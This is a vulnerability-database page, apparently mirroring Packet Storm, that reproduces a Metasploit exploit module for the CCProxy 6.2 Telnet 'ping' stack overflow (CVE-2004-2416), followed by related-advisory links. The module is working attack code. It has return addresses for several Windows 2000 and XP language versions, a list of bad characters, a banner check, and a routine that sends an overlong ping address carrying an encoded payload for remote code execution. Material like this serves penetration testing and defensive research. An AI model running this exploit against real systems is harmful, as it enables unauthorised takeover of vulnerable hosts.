Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormPatrick WebsterPACKETSTORM:83074
HistoryNov 26, 2009 - 12:00 a.m.

CCProxy <= v6.2 Telnet Proxy Ping Overflow

2009-11-2600:00:00
Patrick Webster
packetstormsecurity.com
28

EPSS

0.945

Percentile

99.3%

JSON
`##  
# $Id$  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to   
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/   
##  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Exploit::Remote  
  
include Msf::Exploit::Remote::Tcp  
  
def initialize(info = {})   
super(update_info(info,   
'Name' => 'CCProxy <= v6.2 Telnet Proxy Ping Overflow',  
'Description' => %q{  
This module exploits the YoungZSoft CCProxy <= v6.2 suite  
Telnet service. The stack is overwritten when sending an overly  
long address to the 'ping' command.  
},  
'Author' => [ 'Patrick Webster <patrick[at]aushack.com>' ],  
'Arch' => [ ARCH_X86 ],   
'License' => MSF_LICENSE,  
'Version' => '$Revision$',  
'References' =>  
[  
[ 'CVE', '2004-2416' ],  
[ 'OSVDB', '11593' ],  
[ 'BID', '11666 ' ],  
[ 'URL', 'http://milw0rm.com/exploits/621' ],  
],   
'Privileged' => false,  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'thread',  
},  
'Payload' =>  
{   
'Space' => 1012,  
'BadChars' => "\x00\x07\x08\x0a\x0d\x20",  
},  
'Platform' => ['win'],  
'Targets' =>  
[  
# Patrick - Tested OK 2007/08/19. W2K SP0, W2KSP4, XP SP0, XP SP2 EN.  
[ 'Windows 2000 Pro All - English', { 'Ret' => 0x75023411 } ], # call esi ws2help.dll  
[ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd2b81 } ], # call esi ws2help.dll  
[ 'Windows 2000 Pro All - French', { 'Ret' => 0x74fa2b22 } ], # call esi ws2help.dll  
[ 'Windows XP SP0/1 - English', { 'Ret' => 0x71aa1a97 } ], # call esi ws2help.dll  
[ 'Windows XP SP2 - English', { 'Ret' => 0x71aa1b22 } ], # call esi ws2help.dll  
],  
'DisclosureDate' => 'Nov 11 2004'))  
  
register_options(  
[  
Opt::RPORT(23),  
], self.class)  
end  
  
def autofilter  
false  
end  
  
def check   
connect  
banner = sock.get_once(-1,3)  
disconnect  
  
if (banner =~ /CCProxy Telnet Service Ready/)  
return Exploit::CheckCode::Appears   
end  
return Exploit::CheckCode::Safe  
end  
  
def exploit  
connect  
  
sploit = "p " + payload.encoded + [target['Ret']].pack('V') + make_nops(7)  
sock.put(sploit + "\r\n")  
  
handler  
disconnect  
end  
  
end  
`

Related

nessus 1
zdt 1
cvelist 2
metasploit 1
exploitdb 3
packetstorm 1
nvd 2
checkpoint_advisories 1
cve 2
nessus
nessus
CCProxy Logging Compoent HTTP GET Request Remote Overflow
2004-11-20 00:00:00
zdt
zdt
CCProxy <= v6.2 Telnet Proxy Ping Overflow Exploit (meta)
2007-09-03 00:00:00
cvelist
cvelist
CVE-2004-2416
2005-08-18 04:00:00
CVE-2004-2685
2007-09-06 19:00:00
metasploit
metasploit
CCProxy Telnet Proxy Ping Overflow
2007-09-09 22:39:55
exploitdb
exploitdb
CCProxy <= 6.2 - Telnet Proxy Ping Overflow
2010-04-30 00:00:00
CCProxy Log - Remote Stack Overflow
2004-11-09 00:00:00
CCProxy 6.2 - Telnet Proxy Ping Overflow (Metasploit)
2007-09-03 00:00:00
packetstorm
packetstorm
ccproxy-meta.txt
2007-09-05 00:00:00
nvd
nvd
CVE-2004-2416
2004-12-31 05:00:00
CVE-2004-2685
2004-12-31 05:00:00
checkpoint_advisories
checkpoint_advisories
CCProxy Telnet Ping Hostname Buffer Overflow - Ver2 (CVE-2004-2416)
2015-05-18 00:00:00
cve
cve
CVE-2004-2416
2005-08-18 04:00:00
CVE-2004-2685
2007-09-06 19:00:00

EPSS

0.945

Percentile

99.3%

JSON
Related for PACKETSTORM:83074
nessus1zdt1cvelist2metasploit1exploitdb3packetstorm1nvd2checkpoint_advisories1cve2